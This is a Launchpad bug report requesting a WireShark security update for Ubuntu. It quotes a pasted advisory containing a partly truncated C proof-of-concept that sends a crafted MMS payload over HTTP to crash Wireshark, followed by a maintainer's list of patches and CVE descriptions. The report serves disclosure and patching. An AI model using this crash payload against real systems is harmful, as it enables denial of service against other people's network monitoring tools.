WireShark versions prior to 0.99.6 vulnerability
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
wireshark (Ubuntu) |
Fix Released
|
High
|
Stephan Rügamer | ||
Edgy |
Fix Released
|
High
|
Stephan Rügamer | ||
Feisty |
Fix Released
|
High
|
Stephan Rügamer |
Bug Description
Update WireShark in repo's to 0.99.6 or newer
pasted page from securiteam...
http://
Vulnerable Systems:
* WireShark versions prior to 0.99.6
Immune Systems:
* WireShark version 0.99.6
WireShark parsing a MMS message whose Content-Type is application/
Solution:
Update to WireShark version 0.99.6
Exploit:
//main.cpp
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32")
char *http =
"POST / HTTP/1.0\r\n"
"Content-Type: application/
char *hoststr = "Host: %s:%d\r\n";
char *contentlenstr = "Content-Length: %d\r\n\r\n";
unsigned char mms[] =
{
0x8c,0x80,
0x98,0x7a,
0x8d,0x92,
0x97,0x31,
0x84,0xa3,
///////
0x01,//
0x0f,//HeadersLen
0x05,//DataLen
0x00,//headlen <<<=== If this is 0x00, then wireshark will be crash. The real value is the follow three lines bytes which is 0x0e
///
0x83,0x85,//Utf-8
0x7a,0x77,
0x81,0xea,
///
0x7a,0x77,
};
SOCKET connect_
{
SOCKET sock;
struct hostent *host;
struct sockaddr_in saddr;
if((host=
{
printf("resolv host %s error\n", h);
exit(-1);
}
if((sock=
{
printf("create socket error\n");
exit(-1);
}
memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
saddr.sin_
saddr.sin_
saddr.sin_
if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0)
{
printf("connect to host %s on port %d error\n", h, p);
exit(-1);
}
return sock;
}
void socket_init()
{
WSADATA wsaData;
WSAStartup(
}
int main(int argc, char **argv)
{
SOCKET s;
char sendbuf[1024];
int len = 0;
printf(
if(argc != 3)
{
printf("usage : %s <host> <port>\n", argv[0]);
exit(-1);
}
socket_init();
s = connect_
strcpy(
len += strlen(http);
sprintf(
len = strlen(sendbuf);
sprintf(
len = strlen(sendbuf);
memcpy(
len += sizeof(mms);
send(s, sendbuf, len, 0);
printf(
return 0;
}
Changed in wireshark: | |
importance: | Undecided → High |
Changed in wireshark: | |
status: | Fix Committed → Fix Released |
Well, this is only one of them.....
here is the complete list with fixes...I'm preparing some debdiffs from dapper to feisty. gutsy is clean.
* SECURITY UPDATE: wireshark has several vulnerabilities: patches/ 12_secu_ 0.99.6_ r21034. dpatch: anonsvn. wireshark. org/viewvc/ viewvc. py/trunk/ epan/dissectors /packet- http.c? view=log& pathrev= 21034) patches/ 12_secu_ 0.99.6_ r20990. dpatch: anonsvn. wireshark. org/viewvc/ viewvc. py/trunk/ wiretap/ iseries. c?r1=19814& r2=20990& pathrev= 20990) patches/ 12_secu_ 0.99.6_ r21392. dpatch , secu_0. 99.6_r21665. dpatch: anonsvn. wireshark. org/viewvc/ viewvc. py/trunk/ epan/dissectors /packet- ssl.c?r1= 21650&r2= 21665&pathrev= 21665&view= patch) anonsvn. wireshark. org/viewvc/ viewvc. py/trunk/ epan/dissectors /packet- mms.c?r1= 21088&r2= 21392&pathrev= 21392&view= patch) patches/ 12_secu_ 0.99.6_ r21947. dpatch: anonsvn. wireshark. org/viewvc/ viewvc. py/trunk/ epan/dissectors /packet- bootp.c? r1=21924& r2=21947& pathrev= 21947&view= patch) bugs.wireshark. org/bugzilla/ show_bug. cgi?id= 1394 bugs.wireshark. org/bugzilla/ show_bug. cgi?id= 1415 bugs.wireshark. org/bugzilla/ show_bug. cgi?id= 1342 bugs.wireshark. org/bugzilla/ show_bug. cgi?id= 1582 bugs.wireshark. org/bugzilla/ show_bug. cgi?id= 1416
+ CVE-2007-3389: Wireshark before 0.99.6 allows remote attackers to cause
a denial of service (crash) via a crafted chunked encoding in an HTTP
response, possibly related to a zero-length payload.
+ CVE-2007-3390: Wireshark 0.99.5 and 0.10.x up to 0.10.14, when running
on certain systems, allows remote attackers to cause a denial of service
(crash) via crafted iSeries capture files that trigger a SIGTRAP.
+ CVE-2007-3392: Wireshark before 0.99.6 allows remote attackers to cause
a denial of service via malformed (1) SSL or (2) MMS packets that trigger an
infinite loop.
+ CVE-2007-3393: Off-by-one error in the DHCP/BOOTP dissector in Wireshark
before 0.99.6 allows remote attackers to cause a denial of service (crash) via
crafted DHCP-over-DOCSIS packets.
* debian/
- applied patch from upstream
(Link: http://
* debian/
- applied patch from upstream
(Link: http://
* debian/
12_
- applied patches from upstream
(Link: http://
(Link: http://
* debian/
- applied patch from upstream
(Link: http://
* References:
CVE-2007-3389
http://
CVE-2007-3390
http://
CVE-2007-3392
http://
http://
CVE-2007-3393
http://